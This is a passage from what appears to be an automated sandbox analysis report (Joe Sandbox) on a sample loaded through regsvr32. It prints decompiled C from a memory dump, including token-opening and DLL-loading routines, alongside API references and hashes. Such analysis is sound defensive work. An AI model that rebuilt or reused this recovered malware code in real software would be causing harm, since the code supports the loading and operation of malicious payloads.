              							_t208 =  >  ? _t227 : _t202;
              							_v8 = _t208;
              							_t36 = _t272 + 0x38; // 0xf47d8bff
              							_t37 = _t272 + 0x5c; // 0xee85000
              							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
              							_t273 = _t273 + 0xc;
              							_t252 = _v8;
              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
              							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
              							_t227 = _t227 - _t252;
              						}
              						if(_t227 != 0) {
              							E00746020( *_t272,  *( *_t272 + 0xc), _t227);
              							_t273 = _t273 + 0xc;
              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
              						}
              						_t253 = _a8;
              						if(_t269 == 0) {
              							continue;
              						}
              					} else {
              						if(_t227 != 0 || _t253 == 4) {
              							if(_t253 != 0 && _t227 == _t195) {
              								goto L7;
              							}
              						}
              					}
              					break;
              				}
              				_t142 =  *_t272;
              				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
              				_a4 = _t232;
              				if(_t232 == 0) {
              					_t83 = _t272 + 0x6c; // 0x51ec8b55
              					_t254 =  *_t83;
              				} else {
              					_t59 = _t272 + 0x2c; // 0x8df075ff
              					_t224 =  *_t59;
              					if(_t232 < _t224) {
              						_t65 = _t272 + 0x3c; // 0x830cc483
              						_t66 = _t272 + 0x6c; // 0x51ec8b55
              						_t260 =  *_t66;
              						__eflags =  *_t65 - _t260 - _t232;
              						if( *_t65 - _t260 <= _t232) {
              							_t67 = _t272 + 0x38; // 0xf47d8bff
              							_t261 = _t260 - _t224;
              							 *(_t272 + 0x6c) = _t261;
              							memcpy( *_t67,  *_t67 + _t224, _t261);
              							_t70 = _t272 + 0x16b0; // 0x8508458b
              							_t188 =  *_t70;
              							_t273 = _t273 + 0xc;
              							_t232 = _a4;
              							__eflags = _t188 - 2;
              							if(_t188 < 2) {
              								_t189 = _t188 + 1;
              								__eflags = _t189;
              								 *(_t272 + 0x16b0) = _t189;
              							}
              						}
              						_t73 = _t272 + 0x38; // 0xf47d8bff
              						_t74 = _t272 + 0x6c; // 0x51ec8b55
              						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
              						_t225 = _a4;
              						_t273 = _t273 + 0xc;
              						_t76 = _t272 + 0x6c;
              						 *_t76 =  *(_t272 + 0x6c) + _t225;
              						__eflags =  *_t76;
              						_t78 = _t272 + 0x6c; // 0x51ec8b55
              						_t184 =  *_t78;
              						_t79 = _t272 + 0x2c; // 0x8df075ff
              						_t239 =  *_t79;
              					} else {
              						 *(_t272 + 0x16b0) = 2;
              						_t61 = _t272 + 0x38; // 0xf47d8bff
              						memcpy( *_t61,  *_t142 - _t224, _t224);
              						_t62 = _t272 + 0x2c; // 0x8df075ff
              						_t184 =  *_t62;
              						_t273 = _t273 + 0xc;
              						_t225 = _a4;
              						_t239 = _t184;
              						 *(_t272 + 0x6c) = _t184;
              					}
              					_t254 = _t184;
              					 *(_t272 + 0x5c) = _t184;
              					_t81 = _t272 + 0x16b4; // 0x830a74c0
              					_t185 =  *_t81;
              					_t240 = _t239 - _t185;
              					_t241 =  <=  ? _t225 : _t240;
              					_t242 = ( <=  ? _t225 : _t240) + _t185;
              					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
              				}
              				if( *(_t272 + 0x16c0) < _t254) {
              					 *(_t272 + 0x16c0) = _t254;
              				}
              				if(_t269 == 0) {
              					_t218 = _a8;
              					__eflags = _t218;
              					if(_t218 == 0) {
              						L34:
              						_t89 = _t272 + 0x3c; // 0x830cc483
              						_t219 =  *_t272;
              						_t145 =  *_t89 - _t254 - 1;
              						_a4 =  *_t272;
              						_t234 = _t254;
              						_v16 = _t145;
              						_v8 = _t254;
              						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
              						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
              							_v8 = _t254;
              							_t95 = _t272 + 0x5c; // 0xee85000
              							_a4 = _t219;
              							_t234 = _t254;
              							_t97 = _t272 + 0x2c; // 0x8df075ff
              							__eflags =  *_t95 -  *_t97;
              							if( *_t95 >=  *_t97) {
              								_t98 = _t272 + 0x2c; // 0x8df075ff
              								_t167 =  *_t98;
              								_t259 = _t254 - _t167;
              								_t99 = _t272 + 0x38; // 0xf47d8bff
              								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
              								 *(_t272 + 0x6c) = _t259;
              								memcpy( *_t99, _t167 +  *_t99, _t259);
              								_t103 = _t272 + 0x16b0; // 0x8508458b
              								_t170 =  *_t103;
              								_t273 = _t273 + 0xc;
              								__eflags = _t170 - 2;
              								if(_t170 < 2) {
              									_t172 = _t170 + 1;
              									__eflags = _t172;
              									 *(_t272 + 0x16b0) = _t172;
              								}
              								_t106 = _t272 + 0x2c; // 0x8df075ff
              								_t145 = _v16 +  *_t106;
              								__eflags = _t145;
              								_a4 =  *_t272;
              								_t108 = _t272 + 0x6c; // 0x51ec8b55
              								_t234 =  *_t108;
              								_v8 = _t234;
              							}
              						}
              						_t255 = _a4;
              						_t220 =  *((intOrPtr*)(_a4 + 4));
              						__eflags = _t145 - _t220;
              						_t221 =  <=  ? _t145 : _t220;
              						_t146 = _t221;
              						_a4 = _t221;
              						_t222 = _a8;
              						__eflags = _t146;
              						if(_t146 != 0) {
              							_t114 = _t272 + 0x38; // 0xf47d8bff
              							E00746020(_t255,  *_t114 + _v8, _t146);
              							_t273 = _t273 + 0xc;
              							_t117 = _t272 + 0x6c;
              							 *_t117 =  *(_t272 + 0x6c) + _a4;
              							__eflags =  *_t117;
              							_t119 = _t272 + 0x6c; // 0x51ec8b55
              							_t234 =  *_t119;
              						}
              						__eflags =  *(_t272 + 0x16c0) - _t234;
              						if( *(_t272 + 0x16c0) < _t234) {
              							 *(_t272 + 0x16c0) = _t234;
              						}
              						_t122 = _t272 + 0x16bc; // 0x5d08408b
              						_t123 = _t272 + 0xc; // 0x452bf84d
              						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
              						__eflags = _t257 - 0xffff;
              						_t258 =  >  ? 0xffff : _t257;
              						_t124 = _t272 + 0x2c; // 0x8df075ff
              						_t151 =  *_t124;
              						_t125 = _t272 + 0x5c; // 0xee85000
              						_t235 = _t234 -  *_t125;
              						__eflags = _t258 - _t151;
              						_t152 =  <=  ? _t258 : _t151;
              						__eflags = _t235 - ( <=  ? _t258 : _t151);
              						if(_t235 >= ( <=  ? _t258 : _t151)) {
              							L49:
              							__eflags = _t235 - _t258;
              							_t154 =  >  ? _t258 : _t235;
              							_a4 =  >  ? _t258 : _t235;
              							__eflags = _t222 - 4;
              							if(_t222 != 4) {
              								L53:
              								_t269 = 0;
              								__eflags = 0;
              							} else {
              								_t161 =  *_t272;
              								__eflags =  *(_t161 + 4);
              								_t154 = _a4;
              								if( *(_t161 + 4) != 0) {
              									goto L53;
              								} else {
              									__eflags = _t154 - _t235;
              									if(_t154 != _t235) {
              										goto L53;
              									} else {
              										_t269 = _t222 - 3;
              									}
              								}
              							}
              							_t131 = _t272 + 0x38; // 0xf47d8bff
              							_t132 = _t272 + 0x5c; // 0xee85000
              							E00747180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
              							_t134 = _t272 + 0x5c;
              							 *_t134 =  *(_t272 + 0x5c) + _a4;
              							__eflags =  *_t134;
              							E00745EE0( *_t134,  *_t272);
              						} else {
              							__eflags = _t235;
              							if(_t235 != 0) {
              								L46:
              								__eflags = _t222;
              								if(_t222 != 0) {
              									_t162 =  *_t272;
              									__eflags =  *(_t162 + 4);
              									if( *(_t162 + 4) == 0) {
              										__eflags = _t235 - _t258;
              										if(_t235 <= _t258) {
              											goto L49;
              										}
              									}
              								}
              							} else {
              								__eflags = _t222 - 4;
              								if(_t222 == 4) {
              									goto L46;
              								}
              							}
              						}
              						asm("sbb edi, edi");
              						_t271 =  ~_t269 & 0x00000002;
              						__eflags = _t271;
              						return _t271;
              					} else {
              						__eflags = _t218 - 4;
              						if(_t218 == 4) {
              							goto L34;
              						} else {
              							_t173 =  *_t272;
              							__eflags =  *(_t173 + 4);
              							if( *(_t173 + 4) != 0) {
              								goto L34;
              							} else {
              								_t88 = _t272 + 0x5c; // 0xee85000
              								__eflags = _t254 -  *_t88;
              								if(_t254 !=  *_t88) {
              									goto L34;
              								} else {
              									return 1;
              								}
              							}
              						}
              					}
              				} else {
              					return 3;
              				}
              			}


              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
              • Instruction ID: 5c79aa1b030fa4328cdd6423d85b96cd66c9f1ea9d1a96d16597c1d98f3fb7dc
              • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
              • Instruction Fuzzy Hash: 10D12375A00B049FCB24CF6DC8C4A6AB7E5FF88304B24892DE88ACB712D775E944DB55
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0073C92F(void* __ecx) {
              				void* _v8;
              				void* _t10;
              				intOrPtr _t13;
              
              				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
              					L4:
              					_t10 = _v8;
              				} else {
              					if(GetLastError() != 0x3f0) {
              						L3:
              						_t10 = 0;
              					} else {
              						_t13 =  *0x74f8d0; // 0xc2f8c0
              						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
              							goto L4;
              						} else {
              							goto L3;
              						}
              					}
              				}
              				return _t10;
              			}


              APIs
              • GetCurrentThread.KERNEL32 ref: 0073C942
              • OpenThreadToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C949
              • GetLastError.KERNEL32(?,?,0073CA74,00000000,00730000), ref: 0073C950
              • OpenProcessToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C975
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: OpenThreadToken$CurrentErrorLastProcess
              • String ID:
              • API String ID: 1515895013-0
              • Opcode ID: c0ec55b7b121da5e5bf5176b449e14285ce18180ca36e612123ecec997ce5859
              • Instruction ID: 210b44f2bc2cac9d4c88915ca9dbc75ae4ee332875d4c9c3ce4144e58589787c
              • Opcode Fuzzy Hash: c0ec55b7b121da5e5bf5176b449e14285ce18180ca36e612123ecec997ce5859
              • Instruction Fuzzy Hash: 61F05E76A00209EFEB019BB4DD09FAA73ECFF09304F118462E642E7061D768F9008B64
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 89%
              			E0073D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
              				char _v8;
              				char _v12;
              				char _v140;
              				signed char _t14;
              				char _t15;
              				intOrPtr _t20;
              				void* _t25;
              				intOrPtr _t26;
              				intOrPtr _t32;
              				WCHAR* _t34;
              				intOrPtr _t35;
              				struct HINSTANCE__* _t37;
              				intOrPtr _t38;
              				intOrPtr _t46;
              				void* _t47;
              				intOrPtr _t50;
              				void* _t60;
              				void* _t61;
              				char _t62;
              				void* _t65;
              				intOrPtr _t66;
              				char _t68;
              
              				_t65 = __esi;
              				_t61 = __edi;
              				_t47 = __ebx;
              				_t50 =  *0x74f8d4; // 0xc2fc00
              				_t1 = _t50 + 0x1898; // 0x0
              				_t14 =  *_t1;
              				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
              					_t15 = E00739F85(_t50, 0xb9d);
              					_t66 =  *0x74f8d4; // 0xc2fc00
              					_t62 = _t15;
              					_t67 = _t66 + 0xb0;
              					_v8 = _t62;
              					E00739FE4( &_v140, 0x40, L"%08x", E0073E34A(_t66 + 0xb0, E0073A5D0(_t66 + 0xb0), 0));
              					_t20 =  *0x74f8d4; // 0xc2fc00
              					_t7 = _t20 + 0xa8; // 0x1
              					asm("sbb eax, eax");
              					_t25 = E00739F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
              					_t26 =  *0x74f8d4; // 0xc2fc00
              					_t68 = E00739C50(_t26 + 0x1020);
              					_v12 = _t68;
              					E00738D9A( &_v8);
              					_t32 =  *0x74f8d4; // 0xc2fc00
              					_t34 = E00739C50(_t32 + 0x122a);
              					 *0x74f9d4 = _t34;
              					_t35 =  *0x74f8d0; // 0xc2f8c0
              					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x74c9d8,  &_v140, ".", L"dll", 0, 0x74c9d8, _t25, 0x74c9d8, _t62, 0, _t61, _t65, _t47);
              					_t37 = LoadLibraryW( *0x74f9d4);
              					 *0x74f9cc = _t37;
              					if(_t37 == 0) {
              						_t38 = 0;
              					} else {
              						_push(_t37);
              						_t60 = 0x28;
              						_t38 = E0073F08E(0x74cbc4, _t60);
              					}
              					 *0x74f9d0 = _t38;
              					E00738DDF( &_v12, 0xfffffffe);
              					E00738F63( &_v140, 0, 0x80);
              					if( *0x74f9d0 != 0) {
              						goto L10;
              					} else {
              						E00738DDF(0x74f9d4, 0xfffffffe);
              						goto L8;
              					}
              				} else {
              					L8:
              					if( *0x74f9d0 == 0) {
              						_t46 = E0074F908; // 0xc2fa00
              						 *0x74f9d0 = _t46;
              					}
              					L10:
              					return 1;
              				}
              			}


              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad
              • String ID: %08x$dll
              • API String ID: 1029625771-2963171978
              • Opcode ID: 0136f09616c497c62d825acb2f6b235bebff038a0678fdf0810f4ed8f4cc6fed
              • Instruction ID: 402a8ccc1374a54681329d15f4a2746d4eb5c18fbe53b1034b301ae4746ceba7
              • Opcode Fuzzy Hash: 0136f09616c497c62d825acb2f6b235bebff038a0678fdf0810f4ed8f4cc6fed
              • Instruction Fuzzy Hash: 2F31B1B6A00244BBE710EB68EC4AF6A32ECEB45304F148137F514D7192DF7CAC408765
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 47%
              			E007436D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
              				char _v5;
              				long long _v12;
              				short _v20;
              				signed int _t15;
              				void* _t16;
              				signed int _t22;
              				char _t25;
              				void* _t26;
              				signed int _t28;
              				intOrPtr _t29;
              				void* _t31;
              				char** _t32;
              				long long _t40;
              				long long _t41;
              
              				_t40 = __fp0;
              				_t15 = E007435EE(_a4);
              				 *_t32 = "msxml32.dll";
              				_t28 = _t15 & 0x0fffffff;
              				_t16 = E0073A5D0();
              				_t26 = 0xf;
              				_t25 = 0;
              				_v5 = 0;
              				if(_t16 > _t26) {
              					L2:
              					_t3 = _t25 + 0x41; // 0x41
              					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
              					_t25 = _t25 + 1;
              				} else {
              					_t26 = _t16;
              					if(_t26 != 0) {
              						do {
              							goto L2;
              						} while (_t25 < _t26);
              					}
              				}
              				lstrlenW( &_v20);
              				_t29 = _a8;
              				_t22 = _a12 - _t29 + 1;
              				_a12 = _t22;
              				asm("fild dword [ebp+0x10]");
              				if(_t22 < 0) {
              					_t40 = _t40 +  *0x74cf90;
              				}
              				_a12 = _t28;
              				_v12 = _t40;
              				_t41 = _v12;
              				asm("fild dword [ebp+0x10]");
              				if(_t28 < 0) {
              					_t41 = _t41 +  *0x74cf90;
              				}
              				_v12 = _t41;
              				asm("fmulp st1, st0");
              				L00748995();
              				return _t29 - _t22;
              			}


              APIs
              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0074371C
              • _ftol2_sse.MSVCRT ref: 0074375F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: _ftol2_sselstrlen
              • String ID: msxml32.dll
              • API String ID: 1292649733-2051705522
              • Opcode ID: 2ac7925eeb67dee4144adbaccdcddcfc9f8d61023a96ec2f2c318914d7762f41
              • Instruction ID: 64453bd15d4b6e97919c20e7548e6dda69ed72fcdd9fa754caa2af986eae5f19
              • Opcode Fuzzy Hash: 2ac7925eeb67dee4144adbaccdcddcfc9f8d61023a96ec2f2c318914d7762f41
              • Instruction Fuzzy Hash: C5114C73A00249EBCF019F68EC450DE7F75FF55310F22855AE858C6242EB78C664C345
              Uniqueness

              Uniqueness Score: -1.00%